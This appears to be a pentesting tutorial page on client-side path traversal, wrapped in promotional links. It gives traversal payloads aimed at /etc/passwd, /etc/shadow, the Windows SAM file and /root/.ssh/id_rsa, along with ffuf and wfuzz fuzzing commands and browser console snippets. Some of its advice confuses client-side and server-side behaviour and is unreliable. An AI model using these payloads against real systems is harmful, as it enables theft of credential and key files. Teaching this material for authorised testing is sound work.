# Client-Side Path Traversal
{% tabs %}
{% tab title="Support VeryLazyTech π" %}
* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! π**
* **Follow** us on:
* **β Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **πΎ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **π Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **πΊ YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **π© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **π΅οΈββοΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. π
{% endtab %}
{% endtabs %}
## Basic info
Client-side path traversal is a serious **security vulnerability** that occurs when an attacker manipulates file paths in web applications to gain unauthorized access to files stored on the **client-side or server-side**. Unlike traditional **server-side path traversal attacks**, client-side path traversal exploits weaknesses in web browsers, JavaScript, or local file access mechanisms. This flaw can lead to **sensitive data exposure, code execution, and other security breaches**.
In web applications, developers sometimes use **client-side scripts** to access and manipulate file paths dynamically. This can lead to vulnerabilities if **user input is not properly sanitized**. When a web application allows users to specify file paths without strict validation, an attacker can craft malicious inputs to access restricted files.
Common techniques include:
* **Modifying URL parameters** to access unintended directories.
* **Tampering with JavaScript-based file access** mechanisms.
* **Leveraging browser exploits** to bypass security restrictions.
## **Impact of Client-Side Path Traversal Vulnerabilities**
The consequences of a successful **client-side path traversal attack** can be severe:
* **Unauthorized access to files:** Attackers can read sensitive **local or remote files**.
* **Cross-site scripting (XSS):** Path traversal flaws can lead to **XSS attacks** when combined with improper JavaScript execution.
* **Local file inclusion (LFI):** In some cases, attackers may execute malicious scripts by including unintended files.
* **Code execution:** If exploited correctly, attackers may execute arbitrary code on the victimβs device.
## Description
Nowadays, it is common to have a web application architecture with a back-end API and a dynamic front end such as React or Angular.
In this context, an attacker with control over the {USER\_INPUT} value can perform a path traversal in order to route the victimβs request to another endpoint.
An attacker can coerce a victim into executing this unexpected request. This is the starting point of a Client-Side Path Traversal (CSPT).
A Client-Side Path Traversal can be split into two parts. The source is the trigger of the CSPT, while the sinks are the exploitable endpoints that can be reached by this CSPT.
In order to understand how we can use CSPT as an attack vector, both source and sink must be defined.
***
### **Analyze Web Requests for File Paths**
Use **Burp Suite, OWASP ZAP, or DevTools** (`F12` β Network Tab) to inspect requests containing file paths.
* **Look for file parameters in URLs:**
```bash
https://example.com/getFile?path=/user/docs/report.pdf
```
* **Check if JavaScript fetches files:**
```js
fetch("/api/getFile?name=report.pdf")
```
***
### **Inspect JavaScript for File Path Manipulation**
Download all JavaScript files for analysis:
```bash
wget -r -A .js https://example.com/
```
Search for functions handling file paths:
```bash
grep -rnw '.' -e 'file'
grep -rnw '.' -e 'path'
grep -rnw '.' -e 'fetch'
grep -rnw '.' -e 'XMLHttpRequest'
```
If you find:
```js
document.write('
');
```
This **may be vulnerable** to path manipulation.
***
### **Static Code Analysis**
If you have access to JavaScript files, search for **dangerous functions**:
```bash
grep -rnw '.' -e 'eval'
grep -rnw '.' -e 'document.write'
grep -rnw '.' -e 'innerHTML'
grep -rnw '.' -e 'window.location'
```
Example **vulnerable code**:
```js
let file = getParameterByName("file");
window.location.href = "/documents/" + file;
```
**Try modifying the parameter** to escape directories:
```bash
file=../../../../etc/passwd
file=../../../../windows/win.ini
```
***
### **Testing for Path Traversal in File Requests**
#### **Modify File Path Parameters**
Find URLs with file parameters and modify them.
Original request:
```bash
GET /download?file=user-report.pdf
```
**Test with Path Traversal:**
```bash
GET /download?file=../../../../etc/passwd
GET /download?file=../../../../windows/win.ini
```
If the response contains file contents, it's vulnerable!
#### **Intercept Requests with Burp Suite**
* Open **Burp Suite β Proxy β Intercept Request**
* Modify:
```bash
file=../../../../etc/shadow
file=../../../../etc/hosts
```
#### **Automate Path Traversal Testing**
Use **ffuf** to fuzz the `file` parameter:
```bash
ffuf -u "https://example.com/download?file=FUZZ" -w payloads.txt
```
Example **payloads.txt**:
```txt
../../../../etc/passwd
../../../../windows/system32/config/SAM
../../../../var/log/syslog
../../../../root/.ssh/id_rsa
```
***
### **Manipulating Browser-Based File Access**
#### **Try Loading Local Files**
Open **DevTools Console (`F12`)** and run:
```js
fetch("file:///etc/passwd")
```
If this succeeds, the application allows **local file access**.
#### **Modify Fetch Requests in Console**
If you find:
```js
fetch("/files/user-data.json")
```
Test modifying it:
```js
fetch("/files/../../../../etc/passwd")
```
#### **Use `XMLHttpRequest` to Fetch Local Files**
```js
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "../../../../etc/passwd", false);
xhttp.send();
console.log(xhttp.responseText);
```
***
### **Testing Web Storage (LocalStorage, SessionStorage)**
#### **Check for Stored File Paths**
In **DevTools Console (`F12`)**, run:
```js
console.log(localStorage);
console.log(sessionStorage);
console.log(document.cookie);
```
#### **Modify Stored Paths**
If a file path is stored in `localStorage`, modify it:
```js
localStorage.setItem('configPath', '../../../../etc/passwd');
sessionStorage.setItem('userFile', '../../../../windows/system32/config/SAM');
```
Then **refresh the page** and check if the file loads.
***
### **Exploiting Weak Browser Security Policies**
#### **Check Content Security Policy (CSP)**
Open **DevTools (`F12`) β Network β Headers**\
Look for:
```bash
Content-Security-Policy: default-src 'self'
```
If it **allows `file://` URLs**, it may be exploitable.
#### **Inject JavaScript to Load Arbitrary Files**
```js
let script = document.createElement('script');
script.src = '../../../../etc/passwd';
document.body.appendChild(script);
```
***
## **Automated Path Traversal Scanning**
### **Nikto (Quick Scanner)**
```bash
nikto -h https://example.com
```
### **wfuzz (Path Traversal Fuzzing)**
```bash
wfuzz -c -z file,wordlist.txt --hh 404 "https://example.com/download?file=FUZZ"
```
## CSPT to CSRF
A CSPT is redirecting legitimate HTTP requests, allowing the front end to add necessary tokens for API calls, such as authentication or CSRF tokens. This capability can potentially be exploited to circumvent existing CSRF protection measures.
| | CSRF | CSPT2CSRF |
| ------------------------------------------- | ---- | --------- |
| POST CSRF ? | β
| β
|
| Can control the body ? | β
| β |
| Can work with anti-CSRF token ? | β | β
|
| Can work with Samesite=Lax ? | β | β
|
| GET / PATCH / PUT / DELETE CSRF ? | β | β
|
| 1-click CSRF ? | β | β
|
| Does impact depend on source and on sinks ? | β | β
|
{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com)
Support VeryLazyTech π
* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! π**
* **Follow** us on:
* **β Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **πΎ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **π Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **πΊ YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **π© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **π΅οΈββοΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. π
{% endhint %}